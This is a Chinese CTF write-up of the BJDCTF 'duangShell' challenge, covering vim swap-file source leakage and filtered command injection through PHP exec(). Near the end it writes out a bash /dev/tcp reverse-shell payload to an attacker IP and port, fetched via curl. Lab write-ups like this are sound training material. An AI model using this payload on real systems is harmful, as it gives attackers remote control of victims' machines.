您的位置: 首页  >  文章  >  [BJDCTF 2nd]duangShell(反弹shell,swp泄露)

[BJDCTF 2nd]duangShell(反弹shell,swp泄露)

分类: 文章 2024-05-07 09:27:15

进入题目:
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
swp文件,我第一次做CTF的时候就是swp泄露:[2019EIS高校运维赛]ezupload

swp文件: 非正常关闭vi/vim编辑器时会生成一个.swp文件 关于swp文件
使用vi/vim,经常可以看到swp这个文件,那这个文件是怎么产生的呢,当你打开一个文件,vi就会生成这么一个.(filename)swp文件
以备不测(不测下面讨论),如果你正常退出,那么这个这个swp文件将会自动删除 。

用vim打开:
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
exec():
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
命令执行,但是过滤掉了好多常用的字眼,关键是还过滤了$,难顶,不会,看wp:
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
反弹shell?那是什么东西:
https://www.freebuf.com/articles/system/178150.html

回归正题:

这题反弹shell就是说:从题目的机子,也就是duangshell,发送请求到buu内网的机子,然后buu内网的机子就可以直接在duangshell题目的机子执行命令,从而拿到flag。

步骤:
先在别的浏览器开个buu小号,然后开个内网机子:
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
xshell连上,因为反弹shell需要知道内网的ip地址,所以先ifconfig一下:
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
然后监听任意没被占用的端口:
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
然后在题目中post数据:
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
然后:
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
嗷,我忘了他有过滤,然后又利用python命令反弹,虽然没有被正则匹配到,但是内网机子nc不到任何请求,原因不知,可能因为没有py环境?

通过wp我知道了,可以在内网机子新建一个含有bash -i >& /dev/tcp/174.0.207.178/4444 0>&1的txt文件,然后通过duangshell题目执行curl来访问txt文件的内容,从而使内网机子获取反弹shell。神奇。
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
保存,post女朋友进去:
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
find flag即可。
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
又学到了好多东西,goodgood。

相关推荐